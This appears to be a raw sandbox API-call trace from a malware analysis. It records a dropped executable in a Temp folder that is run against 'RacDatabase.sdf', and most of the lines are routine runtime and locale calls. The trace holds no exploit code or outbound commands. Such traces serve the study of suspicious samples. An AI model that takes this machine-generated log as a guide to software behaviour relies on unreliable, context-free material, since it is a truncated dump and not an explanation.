LockResource (hResData=0x43c648) returned 0x43c648 [0098.025] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x5296f8 [0098.026] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.043] GetLastError () returned 0x20 [0098.043] GetLastError () returned 0x20 [0098.043] SetLastError (dwErrCode=0x20) [0098.043] GetLastError () returned 0x20 [0098.043] SetLastError (dwErrCode=0x20) [0098.043] GetLastError () returned 0x20 [0098.043] SetLastError (dwErrCode=0x20) [0098.043] GetLastError () returned 0x20 [0098.043] SetLastError (dwErrCode=0x20) [0098.043] GetLastError () returned 0x20 [0098.043] SetLastError (dwErrCode=0x20) [0098.043] GetLastError () returned 0x20 [0098.043] SetLastError (dwErrCode=0x20) [0098.043] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1000) returned 0x529718 [0098.044] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0098.046] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5287f8 | out: hHeap=0x510000) returned 1 [0098.046] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0098.046] ExitProcess (uExitCode=0x1) [0098.046] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5270b0 | out: hHeap=0x510000) returned 1 Process: id = "27" image_name = "tdq963ii64.exe" filename = "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe" page_root = "0x39a59000" os_pid = "0x344" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xb20" cmd_line = "tdq963ii.exe -accepteula \"RacDatabase.sdf\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 48 os_tid = 0x8dc [0097.733] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff38 | out: lpSystemTimeAsFileTime=0x12ff38*(dwLowDateTime=0x9e19980, dwHighDateTime=0x1d68287)) [0097.733] GetCurrentThreadId () returned 0x8dc [0097.733] GetCurrentProcessId () returned 0x344 [0097.733] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff40 | out: lpPerformanceCount=0x12ff40*=21808892498) returned 1 [0097.750] GetProcessHeap () returned 0x290000 [0097.754] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77940000 [0097.754] GetProcAddress (hModule=0x77940000, lpProcName="FlsAlloc") returned 0x77957190 [0097.754] GetProcAddress (hModule=0x77940000, lpProcName="FlsFree") returned 0x779515b0 [0097.754] GetProcAddress (hModule=0x77940000, lpProcName="FlsGetValue") returned 0x77963520 [0097.754] GetProcAddress (hModule=0x77940000, lpProcName="FlsSetValue") returned 0x7795bd90 [0097.755] GetProcAddress (hModule=0x77940000, lpProcName="InitializeCriticalSectionEx") returned 0x779579b0 [0097.755] GetProcAddress (hModule=0x77940000, lpProcName="CreateEventExW") returned 0x7798c590 [0097.755] GetProcAddress (hModule=0x77940000, lpProcName="CreateSemaphoreExW") returned 0x7798c4c0 [0097.755] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadStackGuarantee") returned 0x77948050 [0097.755] GetProcAddress (hModule=0x77940000, lpProcName="CreateThreadpoolTimer") returned 0x77948820 [0097.755] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadpoolTimer") returned 0x77a7b2f0 [0097.755] GetProcAddress (hModule=0x77940000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77a6d8c0 [0097.755] GetProcAddress (hModule=0x77940000, lpProcName="CloseThreadpoolTimer") returned 0x77a6d620 [0097.755] GetProcAddress (hModule=0x77940000, lpProcName="CreateThreadpoolWait") returned 0x7798ba80 [0097.756] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadpoolWait") returned 0x77a7e170 [0097.757] GetProcAddress (hModule=0x77940000, lpProcName="CloseThreadpoolWait") returned 0x77a6c540 [0097.757] GetProcAddress (hModule=0x77940000, lpProcName="FlushProcessWriteBuffers") returned 0x77ab1f80 [0097.757] GetProcAddress (hModule=0x77940000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77b2ec60 [0097.757] GetProcAddress (hModule=0x77940000, lpProcName="GetCurrentProcessorNumber") returned 0x77ab0040 [0097.757] GetProcAddress (hModule=0x77940000, lpProcName="GetLogicalProcessorInformation") returned 0x7798b820 [0097.758] GetProcAddress (hModule=0x77940000, lpProcName="CreateSymbolicLinkW") returned 0x779b5ad0 [0097.758] GetProcAddress (hModule=0x77940000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0097.758] GetProcAddress (hModule=0x77940000, lpProcName="EnumSystemLocalesEx") returned 0x7798c3d0 [0097.758] GetProcAddress (hModule=0x77940000, lpProcName="CompareStringEx") returned 0x7798b980 [0097.758] GetProcAddress (hModule=0x77940000, lpProcName="GetDateFormatEx") returned 0x779d0920 [0097.758] GetProcAddress (hModule=0x77940000, lpProcName="GetLocaleInfoEx") returned 0x77943c10 [0097.758] GetProcAddress (hModule=0x77940000, lpProcName="GetTimeFormatEx") returned 0x779cd4e0 [0097.758] GetProcAddress (hModule=0x77940000, lpProcName="GetUserDefaultLocaleName") returned 0x7798b790 [0097.759] GetProcAddress (hModule=0x77940000, lpProcName="IsValidLocaleName") returned 0x7798b770 [0097.759] GetProcAddress (hModule=0x77940000, lpProcName="LCMapStringEx") returned 0x7798b710 [0097.759] GetProcAddress (hModule=0x77940000, lpProcName="GetCurrentPackageId") returned 0x0 [0097.759] GetProcAddress (hModule=0x77940000, lpProcName="GetTickCount64") returned 0x77949450 [0097.759] GetProcAddress (hModule=0x77940000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0097.759] GetProcAddress (hModule=0x77940000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0097.760] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x478) returned 0x2af050 [0097.760] GetCurrentThreadId () returned 0x8dc [0097.760] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x28) returned 0x2a5ed0 [0097.760] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0xb00) returned 0x2af4d0 [0097.760] GetStartupInfoW (in: lpStartupInfo=0x12fe90 | out: lpStartupInfo=0x12fe90*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x14000c2d0, hStdError=0x2af050)) [0097.760] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0097.760] GetFileType (hFile=0x3) returned 0x2 [0097.761] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4 [0097.761] GetFileType (hFile=0x4) returned 0x3 [0097.761] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0097.761] GetFileType (hFile=0xb) returned 0x2 [0097.761] GetCommandLineW () returned="tdq963ii.exe -accepteula \"RacDatabase.sdf\" -nobanner" [0097.761] GetEnvironmentStringsW () returned 0x2affe0* [0097.761] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0xb38) returned 0x2b0b20 [0097.762] FreeEnvironmentStringsW (penv=0x2affe0) returned 1 [0097.762] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14002c980, nSize=0x104 | out: lpFilename="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe")) returned 0x33 [0097.762] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x8e) returned 0x2b1660 [0097.762] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x138) returned 0x2b1700 [0097.762] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x3e) returned 0x2a6510 [0097.762] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x6c) returned 0x2b1840 [0097.762] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x62) returned 0x2b18c0 [0097.762] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x78) returned 0x2b1930 [0097.762] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x62) returned 0x2b19b0 [0097.762] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x2e) returned 0x2ade00 [0097.762] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x48) returned 0x2a6560 [0097.762] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x2a) returned 0x2ade40 [0097.762] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x28) returned 0x2a5f00 [0097.762] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x1a) returned 0x2a5f30 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x4a) returned 0x2b1a20 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x72) returned 0x2b1a80 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x30) returned 0x2ade80 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x2e) returned 0x2adec0 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x1c) returned 0x2a5f60 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0xd2) returned 0x2b1b00 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x7c) returned 0x2b1be0 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x3a) returned 0x2a65b0 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x90) returned 0x2b1c70 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x24) returned 0x2a5f90 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x30) returned 0x2adf00 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x36) returned 0x2adf40 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x3c) returned 0x2a6600 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x52) returned 0x2b1d10 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x3c) returned 0x2a6650 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x18) returned 0x2b1d70 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x82) returned 0x2b1d90 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x2e) returned 0x2adf80 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x1e) returned 0x2a5fc0 [0097.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x2c) returned 0x2adfc0 [0097.764] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x54) returned 0x2b1e20 [0097.764] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x52) returned 0x2b1e80 [0097.764] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x2a) returned 0x2ae000 [0097.764] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x3c) returned 0x2a66a0 [0097.764] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x54) returned 0x2b1ee0 [0097.764] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x24) returned 0x2a5ff0 [0097.764] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x30) returned 0x2ae040 [0097.764] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x8c) returned 0x2affe0 [0097.764] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b0b20 | out: hHeap=0x290000) returned 1 [0097.765] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x1000) returned 0x2b0080 [0097.765] GetLastError () returned 0x0 [0097.765] SetLastError (dwErrCode=0x0) [0097.765] GetLastError () returned 0x0 [0097.765] SetLastError (dwErrCode=0x0) [0097.765] GetLastError () returned 0x0 [0097.765] SetLastError (dwErrCode=0x0) [0097.765] GetACP () returned 0x4e4 [0097.765] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x228) returned 0x2b1090 [0097.765] GetLastError () returned 0x0 [0097.766] SetLastError (dwErrCode=0x0) [0097.766] IsValidCodePage (CodePage=0x4e4) returned 1 [0097.766] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe00 | out: lpCPInfo=0x12fe00) returned 1 [0097.766] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f8a0 | out: lpCPInfo=0x12f8a0) returned 1 [0097.766] GetLastError () returned 0x0 [0097.766] SetLastError (dwErrCode=0x0) [0097.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x12f5a0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ탚ᨈ죐") returned 256 [0097.766] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ탚ᨈ죐", cchSrc=256, lpCharType=0x12fbc0 | out: lpCharType=0x12fbc0) returned 1 [0097.766] GetLastError () returned 0x0 [0097.766] SetLastError (dwErrCode=0x0) [0097.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.767] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x12f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0097.767] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0097.767] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x12f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0097.767] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x12f9c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0097.767] GetLastError () returned 0x0 [0097.767] SetLastError (dwErrCode=0x0) [0097.767] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.767] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x12f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0097.767] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0097.767] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x12f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0097.767] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x12fac0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 